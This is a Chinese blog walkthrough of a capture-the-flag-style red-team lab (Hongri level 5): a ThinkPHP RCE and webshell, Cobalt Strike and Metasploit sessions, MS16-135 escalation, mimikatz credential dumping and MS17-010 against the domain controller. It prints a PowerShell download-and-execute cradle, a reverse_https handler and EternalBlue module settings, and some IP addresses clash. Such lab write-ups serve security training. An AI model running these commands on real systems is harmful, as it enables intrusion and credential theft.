红日靶场第五关

红日靶场第五关

• 可以查看我个人博客http://cllmsy.cn/与我交流，CSDN只是为了方便发图。

一、环境配置

靶场虚拟机共用两个，一个外网一个内网，用来练习红队相关内容和方向，主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com
# win7 web需要打开C盘里的phpstudy，最好关一下防火墙

2008
sun\admin 2020.com
Win7双网卡模拟内外网

VMnet2网卡：192.168.25.0/24 外网
VMnet10网卡：192.168.26.0/24 内网

二、目标

一、环境搭建
    1.环境搭建测试
    2.信息收集
二、漏洞利用
    3.漏洞搜索与利用
    4.漏洞利用Getshell
    5.系统信息收集
    6.主机密码收集
三、内网搜集
    7.内网--继续信息收集
    8.内网攻击姿势--MS14-058
    9.内网攻击姿势--MS17-010
四、横向移动
    10.psexec远控
    11.内网其它主机端口
    12.netsh增删防火墙规则
五、构建通道
    13.内网其它主机端口-代理转发
六、持久控制
    14.域渗透-域成员信息收集
    15.域渗透-基础服务弱口令探测及深度利用之powershell
    16.域渗透-横向移动[wmi利用]
    17.域渗透-域控实现与利用
七、痕迹清理
    18、日志清理

三、WEB外网打点

3.1 资产收集

外网IP得到为192.168.25.128，开启了80端口。

3.2 Thinkphp getshell

3.2.1 tp5_invoke_func_code_exec_1漏洞

3.2.2 文件上传上线冰蝎

上传shell.php

getshell:

四、上线CS

4.1 木马后门上线

4.1.1 配置监听

开启CS

配置监听

攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行

4.1.2 上线CS成功

4.2 powershell上线

4.2.1 powershell命令执行

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.25.132:8899/a’))”

4.3 权限提升

MS16-135提权，插件随便选的。

五、内网信息收集

5.1 本机信息收集

5.1.1 判断存在域控

shell ipconfig /all

5.1.2 本机网卡IP

双网卡，外网为192.168.25.131 内网为192.138.26.134

5.1.3 查看其他域内主机信息

shell net view

5.1.4 判断是否存在多个域

shell net view /domain

5.2 ICMP内网探测

两台机子IP为：192.168.26.131 192.168.26.134(win7)

判断DC为192.168.26.131

5.3 端口扫描

5.4 SMB端口漏洞（永恒之蓝扫描）

5.5 mimikatz抓取

adiminitrator:

leo:

六、内网横向

6.1 psexec传递

获取凭据后，需要对目标网段进行端口存活探测，缩小范围。探测方式比较多，本文仅依托CobalStrike本身完成，不借助其他工具。因为是psexec传递登录，这里仅需探测445端口。（ psexec：在主机上使用服务派生会话 ）

#因为DC不出网，所以psexec传递失败，需要关闭防火墙，或者放行端口，在进行psexec传递攻击，但是我尝试了多种方法，于是决定绕一绕。

6.2 联动MSF

6.2.1 CS上线MSF

# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_https #要用https
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run

下图绕了一绕。

6.3 利用MS17-010永恒之蓝拿下DC

永恒之蓝配置：

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

成功利用：（试了很多遍，这种方法有点玄学，后续会写另一种方法）

6.4 检测

七、总结

这次的靶场可能搭建有点问题，中间卡了几个点，一方面是psexec传递不知道为什么上线不了CS,于是通过了联动MSF，用永恒之蓝拿下了DC域控，在清除痕迹和黄票子还没做细节操作，后续会补上缺失的操作。